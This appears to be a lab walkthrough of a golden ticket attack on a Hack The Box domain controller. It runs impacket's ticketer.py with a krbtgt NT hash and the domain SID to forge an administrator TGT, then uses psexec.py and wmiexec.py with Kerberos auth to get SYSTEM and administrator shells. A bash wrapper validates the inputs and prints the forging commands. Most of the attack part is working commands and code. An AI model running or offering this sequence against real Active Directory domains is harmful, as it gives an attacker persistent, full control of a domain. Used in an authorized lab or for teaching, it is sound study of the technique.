root@ippsec:/usr/share/doc/python3-impacket/examples# python ticketer.py -nthash 8191f826bb148e603acb0f33d17632f8 -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local administrator
Here:
nthash is the NT hash of the krbtgt account, obtained after compromising the domain (for example from secretsdump.py / DCSync or a dump of NTDS.dit). Every TGT in the domain is encrypted with this key, so whoever holds it can forge a TGT for any user: a golden ticket.
The domain SID can be read with this PowerShell command on a domain-joined host (look at the DomainSID field); impacket's lookupsid.py gives the same value from Linux:
Get-ADDomain htb.local
administrator is the username the forged ticket will claim. ticketer.py writes the ticket to administrator.ccache; point KRB5CCNAME at that file so the impacket tools pick it up:
export KRB5CCNAME=administrator.ccache
root@ippsec:/usr/share/doc/python3-impacket/examples# ./psexec.py htb.local/administrator@forest -k -no-pass
Using psexec you get NT AUTHORITY\SYSTEM, because psexec installs and runs a service on the target.
root@ippsec:/usr/share/doc/python3-impacket/examples# ./wmiexec.py htb.local/administrator@forest -k -no-pass
Using wmiexec you get a shell as administrator, since WMI runs the command under the authenticating user.
With -k the target has to be the DC's hostname (forest), not the IP 10.10.10.161: the tools request a service ticket for cifs/<target>, and an IP address is not a valid service principal. The hostname therefore has to resolve, which is what the /etc/hosts entry below is for.
vi /etc/hosts
10.10.10.161 htb.local htb forest
vi /etc/resolv.conf
nameserver 8.8.8.8
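The sequence above fails in a few predictable ways: a krbtgt hash that is not a 32-hex-character NT hash, a domain SID with a trailing RID pasted by mistake, or a target name that does not resolve when -k is used. The following pre-flight wrapper is an added example (not code from the original post or from impacket); it validates those inputs, checks a hosts file for the target name, and prints the ticketer.py / psexec.py commands as a dry run. The hash, SID, domain, user and hostname are the ones from this post, used here as placeholders.

```shell
#!/usr/bin/env bash
# Added example, not part of the original post: pre-flight checks and a
# dry-run wrapper for forging and using a golden ticket with impacket.
# Assumes ticketer.py and psexec.py are on PATH when the printed commands run.

# An NT hash is 16 bytes, i.e. exactly 32 hexadecimal characters.
valid_nthash() {
    case "$1" in
        ""|*[!0-9a-fA-F]*) return 1 ;;
    esac
    [ "${#1}" -eq 32 ]
}

# A domain SID is S-1-5-21-<a>-<b>-<c> with no trailing RID. Passing a
# user SID (one extra "-<rid>") makes ticketer forge a ticket for the wrong
# domain, so reject it here.
valid_domain_sid() {
    printf '%s\n' "$1" | grep -Eq '^S-1-5-21(-[0-9]+){3}$'
}

# Kerberos auth (-k) needs the DC's hostname, not its IP, and that name
# must resolve. Return 0 if the hosts file ($1) lists hostname ($2).
host_in_hosts() {
    awk -v h="$2" '
        BEGIN { found = 1 }
        $1 !~ /^#/ { for (i = 2; i <= NF; i++) if ($i == h) found = 0 }
        END { exit found }' "$1" 2>/dev/null
}

# Validate inputs and print the forge-and-use sequence (dry run).
# $1 krbtgt NT hash, $2 domain SID, $3 domain, $4 user, $5 DC hostname
golden_ticket_cmds() {
    valid_nthash "$1"     || { echo "bad krbtgt NT hash: $1" >&2; return 1; }
    valid_domain_sid "$2" || { echo "bad domain SID: $2" >&2; return 1; }
    host_in_hosts /etc/hosts "$5" ||
        echo "warning: $5 not in /etc/hosts; add it before using -k" >&2
    printf 'ticketer.py -nthash %s -domain-sid %s -domain %s %s\n' "$1" "$2" "$3" "$4"
    printf 'export KRB5CCNAME=%s.ccache\n' "$4"
    printf 'psexec.py %s/%s@%s -k -no-pass\n' "$3" "$4" "$5"
}

# Stand-alone usage (values from the post, placeholders for a real engagement):
#   ./golden.sh 8191f826bb148e603acb0f33d17632f8 \
#       S-1-5-21-3072663084-364016917-1341370565 htb.local administrator forest
if [ "$#" -eq 5 ]; then
    golden_ticket_cmds "$@"
fi
```

The wrapper only prints the commands; paste them into the shell once the checks pass. Keeping the hostname check separate from the forging step mirrors where the failure actually shows up: ticketer.py happily writes a ccache for a bad SID, and the error only appears when psexec.py tries to use it.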